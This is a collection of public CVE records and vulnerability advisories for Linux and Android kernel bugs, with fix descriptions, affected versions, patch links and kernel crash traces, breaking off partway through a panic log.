BUG: KMSAN: uninit-value in raw_lookup net/ipv4/raw_diag.c:49 [inline]
BUG: KMSAN: uninit-value in raw_sock_get+0x657/0x800 net/ipv4/raw_diag.c:71
raw_lookup net/ipv4/raw_diag.c:49 [inline]
raw_sock_get+0x657/0x800 net/ipv4/raw_diag.c:71
raw_diag_dump_one+0xa1/0x660 net/ipv4/raw_diag.c:99
inet_diag_cmd_exact+0x7d9/0x980
inet_diag_get_exact_compat net/ipv4/inet_diag.c:1404 [inline]
inet_diag_rcv_msg_compat+0x469/0x530 net/ipv4/inet_diag.c:1426
sock_diag_rcv_msg+0x23d/0x740 net/core/sock_diag.c:282
netlink_rcv_skb+0x537/0x670 net/netlink/af_netlink.c:2564
sock_diag_rcv+0x35/0x40 net/core/sock_diag.c:297
netlink_unicast_kernel net/netlink/af_netlink.c:1335 [inline]
netlink_unicast+0xe74/0x1240 net/netlink/af_netlink.c:1361
netlink_sendmsg+0x10c6/0x1260 net/netlink/af_netlink.c:1905
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0x332/0x3d0 net/socket.c:745
____sys_sendmsg+0x7f0/0xb70 net/socket.c:2585
___sys_sendmsg+0x271/0x3b0 net/socket.c:2639
__sys_sendmsg net/socket.c:2668 [inline]
__do_sys_sendmsg net/socket.c:2677 [inline]
__se_sys_sendmsg net/socket.c:2675 [inline]
__x64_sys_sendmsg+0x27e/0x4a0 net/socket.c:2675
x64_sys_call+0x135e/0x3ce0 arch/x86/include/generated/asm/syscalls_64.h:47
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xd9/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
Uninit was stored to memory at:
raw_sock_get+0x650/0x800 net/ipv4/raw_diag.c:71
raw_diag_dump_one+0xa1/0x660 net/ipv4/raw_diag.c:99
inet_diag_cmd_exact+0x7d9/0x980
inet_diag_get_exact_compat net/ipv4/inet_diag.c:1404 [inline]
inet_diag_rcv_msg_compat+0x469/0x530 net/ipv4/inet_diag.c:1426
sock_diag_rcv_msg+0x23d/0x740 net/core/sock_diag.c:282
netlink_rcv_skb+0x537/0x670 net/netlink/af_netlink.c:2564
sock_diag_rcv+0x35/0x40 net/core/sock_diag.c:297
netlink_unicast_kernel net/netlink/af_netlink.c:1335 [inline]
netlink_unicast+0xe74/0x1240 net/netlink/af_netlink.c:1361
netlink_sendmsg+0x10c6/0x1260 net/netlink/af_netlink.c:1905
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0x332/0x3d0 net/socket.c:745
____sys_sendmsg+0x7f0/0xb70 net/socket.c:2585
___sys_sendmsg+0x271/0x3b0 net/socket.c:2639
__sys_sendmsg net/socket.c:2668 [inline]
__do_sys_sendmsg net/socket.c:2677 [inline]
__se_sys_sendmsg net/socket.c:2675 [inline]
__x64_sys_sendmsg+0x27e/0x4a0 net/socket.c:2675
x64_sys_call+0x135e/0x3ce0 arch/x86/include/generated/asm/syscalls_64.h:47
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xd9/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
Local variable req.i created at:
inet_diag_get_exact_compat net/ipv4/inet_diag.c:1396 [inline]
inet_diag_rcv_msg_compat+0x2a6/0x530 net/ipv4/inet_diag.c:1426
sock_diag_rcv_msg+0x23d/0x740 net/core/sock_diag.c:282
CPU: 1 PID: 8888 Comm: syz-executor.6 Not tainted 6.10.0-rc4-00217-g35bb670d65fc #32
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-2.fc40 04/01/2014
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 432490f9d455fb842d70219f22d9d2c812371676 Version: 432490f9d455fb842d70219f22d9d2c812371676 Version: 432490f9d455fb842d70219f22d9d2c812371676 Version: 432490f9d455fb842d70219f22d9d2c812371676 Version: 432490f9d455fb842d70219f22d9d2c812371676 Version: 432490f9d455fb842d70219f22d9d2c812371676 Version: 432490f9d455fb842d70219f22d9d2c812371676 Version: 432490f9d455fb842d70219f22d9d2c812371676 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.551Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7094a5fd20ab66028f1da7f06e0f2692d70346f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0184bf0a349f4cf9e663abbe862ff280e8e4dfa2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7ef519c8efde152e0d632337f2994f6921e0b7e4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8366720519ea8d322a20780debdfd23d9fc0904a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d6f487e0704de2f2d15f8dd5d7d723210f2b2fdb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/76965648fe6858db7c5f3c700fef7aa5f124ca1c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f9b2010e8af49fac9d9562146fb81744d8a9b051"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/61cf1c739f08190a4cbf047b9fbb192a94d87e3f"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42106",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:17:46.157657Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:07.725Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/inet_diag.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7094a5fd20ab66028f1da7f06e0f2692d70346f9",
"status": "affected",
"version": "432490f9d455fb842d70219f22d9d2c812371676",
"versionType": "git"
},
{
"lessThan": "0184bf0a349f4cf9e663abbe862ff280e8e4dfa2",
"status": "affected",
"version": "432490f9d455fb842d70219f22d9d2c812371676",
"versionType": "git"
},
{
"lessThan": "7ef519c8efde152e0d632337f2994f6921e0b7e4",
"status": "affected",
"version": "432490f9d455fb842d70219f22d9d2c812371676",
"versionType": "git"
},
{
"lessThan": "8366720519ea8d322a20780debdfd23d9fc0904a",
"status": "affected",
"version": "432490f9d455fb842d70219f22d9d2c812371676",
"versionType": "git"
},
{
"lessThan": "d6f487e0704de2f2d15f8dd5d7d723210f2b2fdb",
"status": "affected",
"version": "432490f9d455fb842d70219f22d9d2c812371676",
"versionType": "git"
},
{
"lessThan": "76965648fe6858db7c5f3c700fef7aa5f124ca1c",
"status": "affected",
"version": "432490f9d455fb842d70219f22d9d2c812371676",
"versionType": "git"
},
{
"lessThan": "f9b2010e8af49fac9d9562146fb81744d8a9b051",
"status": "affected",
"version": "432490f9d455fb842d70219f22d9d2c812371676",
"versionType": "git"
},
{
"lessThan": "61cf1c739f08190a4cbf047b9fbb192a94d87e3f",
"status": "affected",
"version": "432490f9d455fb842d70219f22d9d2c812371676",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/inet_diag.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet_diag: Initialize pad field in struct inet_diag_req_v2\n\nKMSAN reported uninit-value access in raw_lookup() [1]. Diag for raw\nsockets uses the pad field in struct inet_diag_req_v2 for the\nunderlying protocol. This field corresponds to the sdiag_raw_protocol\nfield in struct inet_diag_req_raw.\n\ninet_diag_get_exact_compat() converts inet_diag_req to\ninet_diag_req_v2, but leaves the pad field uninitialized. So the issue\noccurs when raw_lookup() accesses the sdiag_raw_protocol field.\n\nFix this by initializing the pad field in\ninet_diag_get_exact_compat(). Also, do the same fix in\ninet_diag_dump_compat() to avoid the similar issue in the future.\n\n[1]\nBUG: KMSAN: uninit-value in raw_lookup net/ipv4/raw_diag.c:49 [inline]\nBUG: KMSAN: uninit-value in raw_sock_get+0x657/0x800 net/ipv4/raw_diag.c:71\n raw_lookup net/ipv4/raw_diag.c:49 [inline]\n raw_sock_get+0x657/0x800 net/ipv4/raw_diag.c:71\n raw_diag_dump_one+0xa1/0x660 net/ipv4/raw_diag.c:99\n inet_diag_cmd_exact+0x7d9/0x980\n inet_diag_get_exact_compat net/ipv4/inet_diag.c:1404 [inline]\n inet_diag_rcv_msg_compat+0x469/0x530 net/ipv4/inet_diag.c:1426\n sock_diag_rcv_msg+0x23d/0x740 net/core/sock_diag.c:282\n netlink_rcv_skb+0x537/0x670 net/netlink/af_netlink.c:2564\n sock_diag_rcv+0x35/0x40 net/core/sock_diag.c:297\n netlink_unicast_kernel net/netlink/af_netlink.c:1335 [inline]\n netlink_unicast+0xe74/0x1240 net/netlink/af_netlink.c:1361\n netlink_sendmsg+0x10c6/0x1260 net/netlink/af_netlink.c:1905\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x332/0x3d0 net/socket.c:745\n ____sys_sendmsg+0x7f0/0xb70 net/socket.c:2585\n ___sys_sendmsg+0x271/0x3b0 net/socket.c:2639\n __sys_sendmsg net/socket.c:2668 [inline]\n __do_sys_sendmsg net/socket.c:2677 [inline]\n __se_sys_sendmsg net/socket.c:2675 [inline]\n __x64_sys_sendmsg+0x27e/0x4a0 net/socket.c:2675\n x64_sys_call+0x135e/0x3ce0 arch/x86/include/generated/asm/syscalls_64.h:47\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xd9/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nUninit was stored to memory at:\n raw_sock_get+0x650/0x800 net/ipv4/raw_diag.c:71\n raw_diag_dump_one+0xa1/0x660 net/ipv4/raw_diag.c:99\n inet_diag_cmd_exact+0x7d9/0x980\n inet_diag_get_exact_compat net/ipv4/inet_diag.c:1404 [inline]\n inet_diag_rcv_msg_compat+0x469/0x530 net/ipv4/inet_diag.c:1426\n sock_diag_rcv_msg+0x23d/0x740 net/core/sock_diag.c:282\n netlink_rcv_skb+0x537/0x670 net/netlink/af_netlink.c:2564\n sock_diag_rcv+0x35/0x40 net/core/sock_diag.c:297\n netlink_unicast_kernel net/netlink/af_netlink.c:1335 [inline]\n netlink_unicast+0xe74/0x1240 net/netlink/af_netlink.c:1361\n netlink_sendmsg+0x10c6/0x1260 net/netlink/af_netlink.c:1905\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x332/0x3d0 net/socket.c:745\n ____sys_sendmsg+0x7f0/0xb70 net/socket.c:2585\n ___sys_sendmsg+0x271/0x3b0 net/socket.c:2639\n __sys_sendmsg net/socket.c:2668 [inline]\n __do_sys_sendmsg net/socket.c:2677 [inline]\n __se_sys_sendmsg net/socket.c:2675 [inline]\n __x64_sys_sendmsg+0x27e/0x4a0 net/socket.c:2675\n x64_sys_call+0x135e/0x3ce0 arch/x86/include/generated/asm/syscalls_64.h:47\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xd9/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nLocal variable req.i created at:\n inet_diag_get_exact_compat net/ipv4/inet_diag.c:1396 [inline]\n inet_diag_rcv_msg_compat+0x2a6/0x530 net/ipv4/inet_diag.c:1426\n sock_diag_rcv_msg+0x23d/0x740 net/core/sock_diag.c:282\n\nCPU: 1 PID: 8888 Comm: syz-executor.6 Not tainted 6.10.0-rc4-00217-g35bb670d65fc #32\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-2.fc40 04/01/2014"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:23:08.689Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7094a5fd20ab66028f1da7f06e0f2692d70346f9"
},
{
"url": "https://git.kernel.org/stable/c/0184bf0a349f4cf9e663abbe862ff280e8e4dfa2"
},
{
"url": "https://git.kernel.org/stable/c/7ef519c8efde152e0d632337f2994f6921e0b7e4"
},
{
"url": "https://git.kernel.org/stable/c/8366720519ea8d322a20780debdfd23d9fc0904a"
},
{
"url": "https://git.kernel.org/stable/c/d6f487e0704de2f2d15f8dd5d7d723210f2b2fdb"
},
{
"url": "https://git.kernel.org/stable/c/76965648fe6858db7c5f3c700fef7aa5f124ca1c"
},
{
"url": "https://git.kernel.org/stable/c/f9b2010e8af49fac9d9562146fb81744d8a9b051"
},
{
"url": "https://git.kernel.org/stable/c/61cf1c739f08190a4cbf047b9fbb192a94d87e3f"
}
],
"title": "inet_diag: Initialize pad field in struct inet_diag_req_v2",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42106",
"datePublished": "2024-07-30T07:46:01.865Z",
"dateReserved": "2024-07-29T15:50:41.175Z",
"dateUpdated": "2025-05-04T09:23:08.689Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-20368 (GCVE-0-2022-20368)
Vulnerability from cvelistv5
Published
2022-08-11 14:59
Modified
2024-08-03 02:10
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- Elevation of privilege
Summary
Product: AndroidVersions: Android kernelAndroid ID: A-224546354References: Upstream kernel
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T02:10:44.623Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://source.android.com/security/bulletin/pixel/2022-08-01"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Android",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Android kernel"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Product: AndroidVersions: Android kernelAndroid ID: A-224546354References: Upstream kernel"
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Elevation of privilege",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-08-11T14:59:35",
"orgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6",
"shortName": "google_android"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://source.android.com/security/bulletin/pixel/2022-08-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@android.com",
"ID": "CVE-2022-20368",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Android",
"version": {
"version_data": [
{
"version_value": "Android kernel"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Product: AndroidVersions: Android kernelAndroid ID: A-224546354References: Upstream kernel"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Elevation of privilege"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://source.android.com/security/bulletin/pixel/2022-08-01",
"refsource": "MISC",
"url": "https://source.android.com/security/bulletin/pixel/2022-08-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6",
"assignerShortName": "google_android",
"cveId": "CVE-2022-20368",
"datePublished": "2022-08-11T14:59:35",
"dateReserved": "2021-10-14T00:00:00",
"dateUpdated": "2024-08-03T02:10:44.623Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48929 (GCVE-0-2022-48929)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix crash due to out of bounds access into reg2btf_ids.
When commit e6ac2450d6de ("bpf: Support bpf program calling kernel function") added
kfunc support, it defined reg2btf_ids as a cheap way to translate the verifier
reg type to the appropriate btf_vmlinux BTF ID, however
commit c25b2ae13603 ("bpf: Replace PTR_TO_XXX_OR_NULL with PTR_TO_XXX | PTR_MAYBE_NULL")
moved the __BPF_REG_TYPE_MAX from the last member of bpf_reg_type enum to after
the base register types, and defined other variants using type flag
composition. However, now, the direct usage of reg->type to index into
reg2btf_ids may no longer fall into __BPF_REG_TYPE_MAX range, and hence lead to
out of bounds access and kernel crash on dereference of bad pointer.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48929",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:56.249126Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:00.206Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/btf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8c39925e98d498b9531343066ef82ae39e41adae",
"status": "affected",
"version": "8d38cde47a7e17b646401fa92d916503caa5375e",
"versionType": "git"
},
{
"lessThan": "f0ce1bc9e0235dd7412240be493d7ea65ed9eadc",
"status": "affected",
"version": "77459bc4d5e2c6f24db845780b4d9d60cf82d06a",
"versionType": "git"
},
{
"lessThan": "45ce4b4f9009102cd9f581196d480a59208690c1",
"status": "affected",
"version": "c25b2ae136039ffa820c26138ed4a5e5f3ab3841",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/btf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.16.12",
"status": "affected",
"version": "5.16.11",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.16.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix crash due to out of bounds access into reg2btf_ids.\n\nWhen commit e6ac2450d6de (\"bpf: Support bpf program calling kernel function\") added\nkfunc support, it defined reg2btf_ids as a cheap way to translate the verifier\nreg type to the appropriate btf_vmlinux BTF ID, however\ncommit c25b2ae13603 (\"bpf: Replace PTR_TO_XXX_OR_NULL with PTR_TO_XXX | PTR_MAYBE_NULL\")\nmoved the __BPF_REG_TYPE_MAX from the last member of bpf_reg_type enum to after\nthe base register types, and defined other variants using type flag\ncomposition. However, now, the direct usage of reg-\u003etype to index into\nreg2btf_ids may no longer fall into __BPF_REG_TYPE_MAX range, and hence lead to\nout of bounds access and kernel crash on dereference of bad pointer."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:17.781Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8c39925e98d498b9531343066ef82ae39e41adae"
},
{
"url": "https://git.kernel.org/stable/c/f0ce1bc9e0235dd7412240be493d7ea65ed9eadc"
},
{
"url": "https://git.kernel.org/stable/c/45ce4b4f9009102cd9f581196d480a59208690c1"
}
],
"title": "bpf: Fix crash due to out of bounds access into reg2btf_ids.",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48929",
"datePublished": "2024-08-22T03:31:22.329Z",
"dateReserved": "2024-08-21T06:06:23.298Z",
"dateUpdated": "2025-05-04T08:26:17.781Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48885 (GCVE-0-2022-48885)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ice: Fix potential memory leak in ice_gnss_tty_write()
The ice_gnss_tty_write() return directly if the write_buf alloc failed,
leaking the cmd_buf.
Fix by free cmd_buf if write_buf alloc failed.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48885",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:41.711745Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:52.024Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_gnss.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "500ca1da9d0876244eb4d1b0ece6fa0e9968d45d",
"status": "affected",
"version": "d6b98c8d242aee40e7b8919dd07b593b0739e38d",
"versionType": "git"
},
{
"lessThan": "f58985620f55580a07d40062c4115d8c9cf6ae27",
"status": "affected",
"version": "d6b98c8d242aee40e7b8919dd07b593b0739e38d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_gnss.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: Fix potential memory leak in ice_gnss_tty_write()\n\nThe ice_gnss_tty_write() return directly if the write_buf alloc failed,\nleaking the cmd_buf.\n\nFix by free cmd_buf if write_buf alloc failed."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:28.133Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/500ca1da9d0876244eb4d1b0ece6fa0e9968d45d"
},
{
"url": "https://git.kernel.org/stable/c/f58985620f55580a07d40062c4115d8c9cf6ae27"
}
],
"title": "ice: Fix potential memory leak in ice_gnss_tty_write()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48885",
"datePublished": "2024-08-21T06:10:16.947Z",
"dateReserved": "2024-07-16T11:38:08.925Z",
"dateUpdated": "2025-05-04T08:25:28.133Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52899 (GCVE-0-2023-52899)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-21 08:50
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Add exception protection processing for vd in axi_chan_handle_err function
Since there is no protection for vd, a kernel panic will be
triggered here in exceptional cases.
You can refer to the processing of axi_chan_block_xfer_complete function
The triggered kernel panic is as follows:
[ 67.848444] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000060
[ 67.848447] Mem abort info:
[ 67.848449] ESR = 0x96000004
[ 67.848451] EC = 0x25: DABT (current EL), IL = 32 bits
[ 67.848454] SET = 0, FnV = 0
[ 67.848456] EA = 0, S1PTW = 0
[ 67.848458] Data abort info:
[ 67.848460] ISV = 0, ISS = 0x00000004
[ 67.848462] CM = 0, WnR = 0
[ 67.848465] user pgtable: 4k pages, 48-bit VAs, pgdp=00000800c4c0b000
[ 67.848468] [0000000000000060] pgd=0000000000000000, p4d=0000000000000000
[ 67.848472] Internal error: Oops: 96000004 [#1] SMP
[ 67.848475] Modules linked in: dmatest
[ 67.848479] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 5.10.100-emu_x2rc+ #11
[ 67.848483] pstate: 62000085 (nZCv daIf -PAN -UAO +TCO BTYPE=--)
[ 67.848487] pc : axi_chan_handle_err+0xc4/0x230
[ 67.848491] lr : axi_chan_handle_err+0x30/0x230
[ 67.848493] sp : ffff0803fe55ae50
[ 67.848495] x29: ffff0803fe55ae50 x28: ffff800011212200
[ 67.848500] x27: ffff0800c42c0080 x26: ffff0800c097c080
[ 67.848504] x25: ffff800010d33880 x24: ffff80001139d850
[ 67.848508] x23: ffff0800c097c168 x22: 0000000000000000
[ 67.848512] x21: 0000000000000080 x20: 0000000000002000
[ 67.848517] x19: ffff0800c097c080 x18: 0000000000000000
[ 67.848521] x17: 0000000000000000 x16: 0000000000000000
